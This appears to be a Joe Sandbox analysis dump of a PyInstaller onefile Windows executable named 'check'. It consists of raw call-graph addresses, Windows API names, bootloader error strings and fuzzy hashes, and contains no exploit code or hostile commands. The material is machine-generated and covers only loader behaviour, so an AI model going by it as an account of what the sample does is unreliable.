7ff7124f2710 54 API calls 16862->16864 16865 7ff7124f8940 40 API calls 16863->16865 16870 7ff7124f3aab 16863->16870 16864->16898 16865->16870 16866 7ff7124f8830 14 API calls 16867 7ff7124f3bf4 __vcrt_freefls 16866->16867 16868 7ff7124f3c46 16867->16868 16869 7ff7124f3d41 16867->16869 16871 7ff7124f3cd4 16868->16871 16872 7ff7124f3c50 16868->16872 17215 7ff7124f44e0 16869->17215 16870->16866 16875 7ff7124f8830 14 API calls 16871->16875 17097 7ff7124f90e0 16872->17097 16880 7ff7124f3ce0 16875->16880 16876 7ff7124f3d4f 16877 7ff7124f3d65 16876->16877 16878 7ff7124f3d71 16876->16878 17218 7ff7124f4630 16877->17218 16883 7ff7124f1c80 49 API calls 16878->16883 16881 7ff7124f3c61 16880->16881 16884 7ff7124f3ced 16880->16884 16886 7ff7124f2710 54 API calls 16881->16886 16893 7ff7124f3cc8 __vcrt_freefls 16883->16893 16887 7ff7124f1c80 49 API calls 16884->16887 16886->16898 16890 7ff7124f3d0b 16887->16890 16888 7ff7124f3dc4 17147 7ff7124f9390 16888->17147 16892 7ff7124f3d12 16890->16892 16890->16893 16896 7ff7124f2710 54 API calls 16892->16896 16893->16888 16894 7ff7124f3da7 SetDllDirectoryW LoadLibraryExW 16893->16894 16894->16888 16895 7ff7124f3dd7 SetDllDirectoryW 16899 7ff7124f3e0a 16895->16899 16940 7ff7124f3e5a 16895->16940 16896->16898 16898->16824 16900 7ff7124f8830 14 API calls 16899->16900 16908 7ff7124f3e16 __vcrt_freefls 16900->16908 16901 7ff7124f4008 16903 7ff7124f4035 16901->16903 16904 7ff7124f4012 PostMessageW GetMessageW 16901->16904 16902 7ff7124f3f1b 17152 7ff7124f33c0 16902->17152 17295 7ff7124f3360 16903->17295 16904->16903 16910 7ff7124f3ef2 16908->16910 16915 7ff7124f3e4e 16908->16915 16914 7ff7124f8940 40 API calls 16910->16914 16914->16940 16915->16940 17221 7ff7124f6dc0 16915->17221 16920 7ff7124f6fc0 FreeLibrary 16922 7ff7124f405b 16920->16922 16928 7ff7124f3e81 16931 7ff7124f3ea2 16928->16931 16942 7ff7124f3e85 16928->16942 17242 7ff7124f6e00 16928->17242 16931->16942 17261 7ff7124f71b0 16931->17261 16940->16901 16940->16902 16942->16940 17277 
7ff7124f2a50 16942->17277 16952 7ff712509b43 16951->16952 16953 7ff712509b64 16951->16953 16952->16797 16954 7ff71250a3d8 45 API calls 16953->16954 16955 7ff712509b69 16954->16955 16957 7ff7124fd2c9 16956->16957 16957->16805 16959 7ff7124fcfa1 16958->16959 16960 7ff7124fcd60 16959->16960 16961 7ff7124fd888 7 API calls 16959->16961 16960->16795 16961->16960 16963 7ff7124fd152 __GetCurrentState __scrt_get_show_window_mode 16962->16963 16964 7ff7124fd171 RtlCaptureContext RtlLookupFunctionEntry 16963->16964 16965 7ff7124fd1d6 __scrt_get_show_window_mode 16964->16965 16966 7ff7124fd19a RtlVirtualUnwind 16964->16966 16967 7ff7124fd208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16965->16967 16966->16965 16968 7ff7124fd256 __GetCurrentState 16967->16968 16968->16793 16970 7ff7124fd890 16969->16970 16971 7ff7124fd89a 16969->16971 16975 7ff7124fdc24 16970->16975 16971->16812 16976 7ff7124fdc33 16975->16976 16977 7ff7124fd895 16975->16977 16983 7ff7124fde60 16976->16983 16979 7ff7124fdc90 16977->16979 16980 7ff7124fdcbb 16979->16980 16981 7ff7124fdcbf 16980->16981 16982 7ff7124fdc9e DeleteCriticalSection 16980->16982 16981->16971 16982->16980 16987 7ff7124fdcc8 16983->16987 16988 7ff7124fddb2 TlsFree 16987->16988 16994 7ff7124fdd0c __vcrt_InitializeCriticalSectionEx 16987->16994 16989 7ff7124fdd3a LoadLibraryExW 16991 7ff7124fdd5b GetLastError 16989->16991 16992 7ff7124fddd9 16989->16992 16990 7ff7124fddf9 GetProcAddress 16990->16988 16991->16994 16992->16990 16993 7ff7124fddf0 FreeLibrary 16992->16993 16993->16990 16994->16988 16994->16989 16994->16990 16995 7ff7124fdd7d LoadLibraryExW 16994->16995 16995->16992 16995->16994 16997 7ff7124fd28b GetStartupInfoW 16996->16997 16997->16800 17000 7ff71250f480 16998->17000 16999 7ff71250f4d3 17001 7ff71250a814 _invalid_parameter_noinfo 37 API calls 16999->17001 17000->16999 17002 7ff71250f526 17000->17002 17004 7ff71250f4fc 17001->17004 17308 7ff71250f358 17002->17308 17004->16820 17316 7ff7124fc850 
17005->17316 17008 7ff7124f3710 17318 7ff7124f9280 FindFirstFileExW 17008->17318 17009 7ff7124f36eb GetLastError 17323 7ff7124f2c50 17009->17323 17013 7ff7124f3706 17017 7ff7124fc550 _log10_special 8 API calls 17013->17017 17014 7ff7124f3723 17338 7ff7124f9300 CreateFileW 17014->17338 17015 7ff7124f377d 17349 7ff7124f9440 17015->17349 17020 7ff7124f37b5 17017->17020 17020->16898 17027 7ff7124f1950 17020->17027 17021 7ff7124f378b 17021->17013 17025 7ff7124f2810 49 API calls 17021->17025 17022 7ff7124f3734 17341 7ff7124f2810 17022->17341 17023 7ff7124f374c __vcrt_InitializeCriticalSectionEx 17023->17015 17025->17013 17028 7ff7124f45c0 108 API calls 17027->17028 17029 7ff7124f1985 17028->17029 17030 7ff7124f1c43 17029->17030 17031 7ff7124f7f90 83 API calls 17029->17031 17032 7ff7124fc550 _log10_special 8 API calls 17030->17032 17033 7ff7124f19cb 17031->17033 17034 7ff7124f1c5e 17032->17034 17076 7ff7124f1a03 17033->17076 17694 7ff7125006d4 17033->17694 17034->16827 17034->16828 17036 7ff71250004c 74 API calls 17036->17030 17037 7ff7124f19e5 17038 7ff7124f19e9 17037->17038 17039 7ff7124f1a08 17037->17039 17040 7ff712504f08 _get_daylight 11 API calls 17038->17040 17698 7ff71250039c 17039->17698 17042 7ff7124f19ee 17040->17042 17701 7ff7124f2910 17042->17701 17044 7ff7124f1a45 17050 7ff7124f1a7b 17044->17050 17051 7ff7124f1a5c 17044->17051 17045 7ff7124f1a26 17047 7ff712504f08 _get_daylight 11 API calls 17045->17047 17048 7ff7124f1a2b 17047->17048 17049 7ff7124f2910 54 API calls 17048->17049 17049->17076 17053 7ff7124f1c80 49 API calls 17050->17053 17052 7ff712504f08 _get_daylight 11 API calls 17051->17052 17054 7ff7124f1a61 17052->17054 17055 7ff7124f1a92 17053->17055 17057 7ff7124f2910 54 API calls 17054->17057 17056 7ff7124f1c80 49 API calls 17055->17056 17058 7ff7124f1add 17056->17058 17057->17076 17059 7ff7125006d4 73 API calls 17058->17059 17060 7ff7124f1b01 17059->17060 17061 7ff7124f1b35 17060->17061 17062 7ff7124f1b16 17060->17062 17064 7ff71250039c 
_fread_nolock 53 API calls 17061->17064 17063 7ff712504f08 _get_daylight 11 API calls 17062->17063 17065 7ff7124f1b1b 17063->17065 17066 7ff7124f1b4a 17064->17066 17067 7ff7124f2910 54 API calls 17065->17067 17068 7ff7124f1b6f 17066->17068 17069 7ff7124f1b50 17066->17069 17067->17076 17716 7ff712500110 17068->17716 17071 7ff712504f08 _get_daylight 11 API calls 17069->17071 17072 7ff7124f1b55 17071->17072 17074 7ff7124f2910 54 API calls 17072->17074 17074->17076 17075 7ff7124f2710 54 API calls 17075->17076 17076->17036 17078 7ff7124f883a 17077->17078 17079 7ff7124f9390 2 API calls 17078->17079 17080 7ff7124f8859 GetEnvironmentVariableW 17079->17080 17081 7ff7124f8876 ExpandEnvironmentStringsW 17080->17081 17082 7ff7124f88c2 17080->17082 17081->17082 17084 7ff7124f8898 17081->17084 17083 7ff7124fc550 _log10_special 8 API calls 17082->17083 17085 7ff7124f88d4 17083->17085 17086 7ff7124f9440 2 API calls 17084->17086 17085->16835 17087 7ff7124f88aa 17086->17087 17088 7ff7124fc550 _log10_special 8 API calls 17087->17088 17089 7ff7124f88ba 17088->17089 17089->16835 17091 7ff7124f9390 2 API calls 17090->17091 17092 7ff7124f895c 17091->17092 17093 7ff7124f9390 2 API calls 17092->17093 17094 7ff7124f896c 17093->17094 17931 7ff712508238 17094->17931 17096 7ff7124f897a __vcrt_freefls 17096->16848 17098 7ff7124f90f5 17097->17098 17949 7ff7124f8570 GetCurrentProcess OpenProcessToken 17098->17949 17101 7ff7124f8570 7 API calls 17102 7ff7124f9121 17101->17102 17103 7ff7124f9154 17102->17103 17104 7ff7124f913a 17102->17104 17105 7ff7124f26b0 48 API calls 17103->17105 17106 7ff7124f26b0 48 API calls 17104->17106 17107 7ff7124f9167 LocalFree LocalFree 17105->17107 17108 7ff7124f9152 17106->17108 17109 7ff7124f9183 17107->17109 17111 7ff7124f918f 17107->17111 17108->17107 17959 7ff7124f2b50 17109->17959 17112 7ff7124fc550 _log10_special 8 API calls 17111->17112 17113 7ff7124f3c55 17112->17113 17113->16881 17114 7ff7124f8660 17113->17114 17115 7ff7124f8678 17114->17115 17116 
7ff7124f869c 17115->17116 17117 7ff7124f86fa GetTempPathW GetCurrentProcessId 17115->17117 17119 7ff7124f8830 14 API calls 17116->17119 17968 7ff7124f25c0 17117->17968 17120 7ff7124f86a8 17119->17120 17975 7ff7124f81d0 17120->17975 17125 7ff7124f86e8 __vcrt_freefls 17146 7ff7124f87d4 __vcrt_freefls 17125->17146 17127 7ff712508238 38 API calls 17130 7ff7124f86ce __vcrt_freefls 17127->17130 17129 7ff7124f8728 __vcrt_freefls 17133 7ff7124f8765 __vcrt_freefls 17129->17133 17972 7ff712508b68 17129->17972 17130->17117 17134 7ff7124f86dc 17130->17134 17132 7ff7124fc550 _log10_special 8 API calls 17136 7ff7124f3cbb 17132->17136 17138 7ff7124f9390 2 API calls 17133->17138 17133->17146 17137 7ff7124f2810 49 API calls 17134->17137 17136->16881 17136->16893 17137->17125 17139 7ff7124f87b1 17138->17139 17140 7ff7124f87b6 17139->17140 17141 7ff7124f87e9 17139->17141 17143 7ff7124f9390 2 API calls 17140->17143 17142 7ff712508238 38 API calls 17141->17142 17142->17146 17144 7ff7124f87c6 17143->17144 17145 7ff712508238 38 API calls 17144->17145 17145->17146 17146->17132 17148 7ff7124f93b2 MultiByteToWideChar 17147->17148 17149 7ff7124f93d6 17147->17149 17148->17149 17151 7ff7124f93ec __vcrt_freefls 17148->17151 17150 7ff7124f93f3 MultiByteToWideChar 17149->17150 17149->17151 17150->17151 17151->16895 17158 7ff7124f33ce __scrt_get_show_window_mode 17152->17158 17153 7ff7124f35c7 17154 7ff7124fc550 _log10_special 8 API calls 17153->17154 17155 7ff7124f3664 17154->17155 17155->16898 17171 7ff7124f90c0 LocalFree 17155->17171 17157 7ff7124f1c80 49 API calls 17157->17158 17158->17153 17158->17157 17163 7ff7124f35c9 17158->17163 17165 7ff7124f35e2 17158->17165 17166 7ff7124f2a50 54 API calls 17158->17166 17169 7ff7124f35d0 17158->17169 18241 7ff7124f4560 17158->18241 18247 7ff7124f7e20 17158->18247 18258 7ff7124f1600 17158->18258 18306 7ff7124f7120 17158->18306 18310 7ff7124f4190 17158->18310 18354 7ff7124f4450 17158->18354 17160 7ff7124f2710 54 API calls 17160->17153 17164 7ff7124f2710 
54 API calls 17163->17164 17164->17153 17165->17160 17166->17158 17170 7ff7124f2710 54 API calls 17169->17170 17170->17153 17173 7ff7124f1ca5 17172->17173 17174 7ff712504984 49 API calls 17173->17174 17175 7ff7124f1cc8 17174->17175 17175->16831 17177 7ff7124f9390 2 API calls 17176->17177 17178 7ff7124f89b4 17177->17178 17179 7ff712508238 38 API calls 17178->17179 17180 7ff7124f89c6 __vcrt_freefls 17179->17180 17180->16845 17182 7ff7124f45cc 17181->17182 17183 7ff7124f9390 2 API calls 17182->17183 17184 7ff7124f45f4 17183->17184 17185 7ff7124f9390 2 API calls 17184->17185 17186 7ff7124f4607 17185->17186 18521 7ff712505f94 17186->18521 17189 7ff7124fc550 _log10_special 8 API calls 17190 7ff7124f392b 17189->17190 17190->16834 17191 7ff7124f7f90 17190->17191 17192 7ff7124f7fb4 17191->17192 17193 7ff7125006d4 73 API calls 17192->17193 17196 7ff7124f808b __vcrt_freefls 17192->17196 17194 7ff7124f7fd0 17193->17194 17194->17196 18912 7ff7125078c8 17194->18912 17196->16838 17197 7ff7125006d4 73 API calls 17199 7ff7124f7fe5 17197->17199 17198 7ff71250039c _fread_nolock 53 API calls 17198->17199 17199->17196 17199->17197 17199->17198 17201 7ff71250007c 17200->17201 18927 7ff7124ffe28 17201->18927 17203 7ff712500095 17203->16834 17205 7ff7124fc850 17204->17205 17206 7ff7124f2734 GetCurrentProcessId 17205->17206 17207 7ff7124f1c80 49 API calls 17206->17207 17208 7ff7124f2787 17207->17208 17209 7ff712504984 49 API calls 17208->17209 17210 7ff7124f27cf 17209->17210 17211 7ff7124f2620 12 API calls 17210->17211 17212 7ff7124f27f1 17211->17212 17213 7ff7124fc550 _log10_special 8 API calls 17212->17213 17214 7ff7124f2801 17213->17214 17214->16898 17216 7ff7124f1c80 49 API calls 17215->17216 17217 7ff7124f44fd 17216->17217 17217->16876 17219 7ff7124f1c80 49 API calls 17218->17219 17220 7ff7124f4660 17219->17220 17220->16893 17222 7ff7124f6dd5 17221->17222 17223 7ff7124f3e6c 17222->17223 17224 7ff712504f08 _get_daylight 11 API calls 17222->17224 17227 7ff7124f7340 17223->17227 17225 
7ff7124f6de2 17224->17225 17226 7ff7124f2910 54 API calls 17225->17226 17226->17223 18938 7ff7124f1470 17227->18938 17229 7ff7124f7368 17230 7ff7124f4630 49 API calls 17229->17230 17236 7ff7124f74b9 __vcrt_freefls 17229->17236 17231 7ff7124f738a 17230->17231 17232 7ff7124f4630 49 API calls 17231->17232 17234 7ff7124f738f 17231->17234 17235 7ff7124f73ae 17232->17235 17233 7ff7124f2a50 54 API calls 17233->17236 17234->17233 17235->17234 17237 7ff7124f4630 49 API calls 17235->17237 17236->16928 17238 7ff7124f73ca 17237->17238 17238->17234 17253 7ff7124f6e1c 17242->17253 17243 7ff7124fc550 _log10_special 8 API calls 17244 7ff7124f1840 45 API calls 17244->17253 17246 7ff7124f6faa 17248 7ff7124f2710 54 API calls 17246->17248 17247 7ff7124f1c80 49 API calls 17247->17253 17260 7ff7124f6f3f 17248->17260 17249 7ff7124f6f97 17250 7ff7124f2710 54 API calls 17249->17250 17250->17260 17251 7ff7124f4560 10 API calls 17251->17253 17252 7ff7124f7e20 52 API calls 17252->17253 17253->17244 17253->17246 17253->17247 17253->17249 17253->17251 17253->17252 17254 7ff7124f2a50 54 API calls 17253->17254 17255 7ff7124f6f84 17253->17255 17256 7ff7124f1600 118 API calls 17253->17256 17258 7ff7124f6f6d 17253->17258 17253->17260 17254->17253 17257 7ff7124f2710 54 API calls 17255->17257 17256->17253 17257->17260 17259 7ff7124f2710 54 API calls 17258->17259 17259->17260 17260->17243 18968 7ff7124f8e80 17261->18968 17278 7ff7124fc850 17277->17278 19044 7ff7124f6360 17295->19044 17298 7ff7124f3399 17304 7ff7124f3670 17298->17304 17305 7ff7124f367e 17304->17305 17306 7ff7124f368f 17305->17306 19317 7ff7124f8e60 FreeLibrary 17305->19317 17306->16920 17315 7ff71250546c EnterCriticalSection 17308->17315 17317 7ff7124f36bc GetModuleFileNameW 17316->17317 17317->17008 17317->17009 17319 7ff7124f92d2 17318->17319 17320 7ff7124f92bf FindClose 17318->17320 17321 7ff7124fc550 _log10_special 8 API calls 17319->17321 17320->17319 17322 7ff7124f371a 17321->17322 17322->17014 17322->17015 17324 7ff7124fc850 
17323->17324 17325 7ff7124f2c70 GetCurrentProcessId 17324->17325 17354 7ff7124f26b0 17325->17354 17327 7ff7124f2cb9 17358 7ff712504bd8 17327->17358 17330 7ff7124f26b0 48 API calls 17331 7ff7124f2d34 FormatMessageW 17330->17331 17333 7ff7124f2d7f MessageBoxW 17331->17333 17334 7ff7124f2d6d 17331->17334 17336 7ff7124fc550 _log10_special 8 API calls 17333->17336 17335 7ff7124f26b0 48 API calls 17334->17335 17335->17333 17337 7ff7124f2daf 17336->17337 17337->17013 17339 7ff7124f9340 GetFinalPathNameByHandleW CloseHandle 17338->17339 17340 7ff7124f3730 17338->17340 17339->17340 17340->17022 17340->17023 17342 7ff7124f2834 17341->17342 17343 7ff7124f26b0 48 API calls 17342->17343 17344 7ff7124f2887 17343->17344 17345 7ff712504bd8 48 API calls 17344->17345 17346 7ff7124f28d0 MessageBoxW 17345->17346 17347 7ff7124fc550 _log10_special 8 API calls 17346->17347 17348 7ff7124f2900 17347->17348 17348->17013 17350 7ff7124f946a WideCharToMultiByte 17349->17350 17352 7ff7124f9495 17349->17352 17350->17352 17353 7ff7124f94ab __vcrt_freefls 17350->17353 17351 7ff7124f94b2 WideCharToMultiByte 17351->17353 17352->17351 17352->17353 17353->17021 17355 7ff7124f26d5 17354->17355 17356 7ff712504bd8 48 API calls 17355->17356 17357 7ff7124f26f8 17356->17357 17357->17327 17359 7ff712504c32 17358->17359 17360 7ff712504c57 17359->17360 17362 7ff712504c93 17359->17362 17361 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17360->17361 17364 7ff712504c81 17361->17364 17376 7ff712502f90 17362->17376 17367 7ff7124fc550 _log10_special 8 API calls 17364->17367 17365 7ff712504d74 17368 7ff71250a948 __free_lconv_num 11 API calls 17365->17368 17369 7ff7124f2d04 17367->17369 17368->17364 17369->17330 17370 7ff712504d9a 17370->17365 17372 7ff712504da4 17370->17372 17371 7ff712504d49 17373 7ff71250a948 __free_lconv_num 11 API calls 17371->17373 17375 7ff71250a948 __free_lconv_num 11 API calls 17372->17375 17373->17364 17374 7ff712504d40 17374->17365 17374->17371 17375->17364 17377 7ff712502fce 
17376->17377 17378 7ff712502fbe 17376->17378 17379 7ff712502fd7 17377->17379 17384 7ff712503005 17377->17384 17382 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17378->17382 17380 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17379->17380 17381 7ff712502ffd 17380->17381 17381->17365 17381->17370 17381->17371 17381->17374 17382->17381 17384->17378 17384->17381 17387 7ff7125039a4 17384->17387 17420 7ff7125033f0 17384->17420 17457 7ff712502b80 17384->17457 17388 7ff7125039e6 17387->17388 17389 7ff712503a57 17387->17389 17390 7ff712503a81 17388->17390 17391 7ff7125039ec 17388->17391 17392 7ff712503ab0 17389->17392 17393 7ff712503a5c 17389->17393 17480 7ff712501d54 17390->17480 17394 7ff7125039f1 17391->17394 17395 7ff712503a20 17391->17395 17397 7ff712503ac7 17392->17397 17401 7ff712503aba 17392->17401 17405 7ff712503abf 17392->17405 17398 7ff712503a91 17393->17398 17400 7ff712503a5e 17393->17400 17394->17397 17402 7ff7125039f7 17394->17402 17395->17402 17395->17405 17494 7ff7125046ac 17397->17494 17487 7ff712501944 17398->17487 17399 7ff712503a00 17418 7ff712503af0 17399->17418 17460 7ff712504158 17399->17460 17400->17399 17409 7ff712503a6d 17400->17409 17401->17390 17401->17405 17402->17399 17408 7ff712503a32 17402->17408 17416 7ff712503a1b 17402->17416 17405->17418 17498 7ff712502164 17405->17498 17408->17418 17470 7ff712504494 17408->17470 17409->17390 17411 7ff712503a72 17409->17411 17411->17418 17476 7ff712504558 17411->17476 17412 7ff7124fc550 _log10_special 8 API calls 17413 7ff712503dea 17412->17413 17413->17384 17416->17418 17419 7ff712503cdc 17416->17419 17505 7ff7125047c0 17416->17505 17418->17412 17419->17418 17511 7ff71250ea08 17419->17511 17421 7ff712503414 17420->17421 17422 7ff7125033fe 17420->17422 17425 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17421->17425 17437 7ff712503454 17421->17437 17423 7ff7125039e6 17422->17423 17424 7ff712503a57 17422->17424 17422->17437 17426 7ff7125039ec 17423->17426 17428 7ff712503a81 17423->17428 
17427 7ff712503a5c 17424->17427 17433 7ff712503ab0 17424->17433 17425->17437 17429 7ff7125039f1 17426->17429 17430 7ff712503a20 17426->17430 17431 7ff712503a91 17427->17431 17432 7ff712503a5e 17427->17432 17434 7ff712501d54 38 API calls 17428->17434 17435 7ff712503ac7 17429->17435 17439 7ff7125039f7 17429->17439 17430->17439 17442 7ff712503abf 17430->17442 17440 7ff712501944 38 API calls 17431->17440 17436 7ff712503a00 17432->17436 17446 7ff712503a6d 17432->17446 17433->17435 17438 7ff712503aba 17433->17438 17433->17442 17453 7ff712503a1b 17434->17453 17443 7ff7125046ac 45 API calls 17435->17443 17441 7ff712504158 47 API calls 17436->17441 17456 7ff712503af0 17436->17456 17437->17384 17438->17428 17438->17442 17439->17436 17444 7ff712503a32 17439->17444 17439->17453 17440->17453 17441->17453 17445 7ff712502164 38 API calls 17442->17445 17442->17456 17443->17453 17447 7ff712504494 46 API calls 17444->17447 17444->17456 17445->17453 17446->17428 17448 7ff712503a72 17446->17448 17447->17453 17451 7ff712504558 37 API calls 17448->17451 17448->17456 17449 7ff7124fc550 _log10_special 8 API calls 17450 7ff712503dea 17449->17450 17450->17384 17451->17453 17452 7ff7125047c0 45 API calls 17455 7ff712503cdc 17452->17455 17453->17452 17453->17455 17453->17456 17454 7ff71250ea08 46 API calls 17454->17455 17455->17454 17455->17456 17456->17449 17677 7ff712500fc8 17457->17677 17461 7ff71250417e 17460->17461 17523 7ff712500b80 17461->17523 17466 7ff7125047c0 45 API calls 17469 7ff7125042c3 17466->17469 17467 7ff712504351 17467->17416 17467->17467 17468 7ff7125047c0 45 API calls 17468->17467 17469->17467 17469->17468 17469->17469 17472 7ff7125044c9 17470->17472 17471 7ff71250450e 17471->17416 17472->17471 17473 7ff7125044e7 17472->17473 17474 7ff7125047c0 45 API calls 17472->17474 17475 7ff71250ea08 46 API calls 17473->17475 17474->17473 17475->17471 17479 7ff712504579 17476->17479 17477 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17478 7ff7125045aa 17477->17478 

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                          • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                          • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                          • Instruction ID: de895dd2365ba0ef98c58d2bfce7aa97faa4e608715dfdfbf80a4aa30cc44fd1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DD15432B08E9286FB10AF34E8942ADB760FF84768F800235DE5D46A95DFBCD559C710

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                          • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                          • Opcode ID: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
                                                                                                                                                                                                                                          • Instruction ID: 13a1cf9cfc0490d70509ab780e1adc8d9ddc2affd3ac70d1af915af003fb0ca4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83326021B0CEC251FB15FB2994553B9AA91AF847A0FC44072DE5D432D6EFACE96CC321

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515C45
                                                                                                                                                                                                                                            • Part of subcall function 00007FF712515598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7125155AC
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: RtlFreeHeap.NTDLL(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A95E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: GetLastError.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A968
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF71250A8DF,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250A909
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF71250A8DF,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250A92E
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515C34
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7125155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71251560C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EAA
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EBB
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515ECC
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF71251610C), ref: 00007FF712515EF3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                          • API String ID: 4070488512-239921721
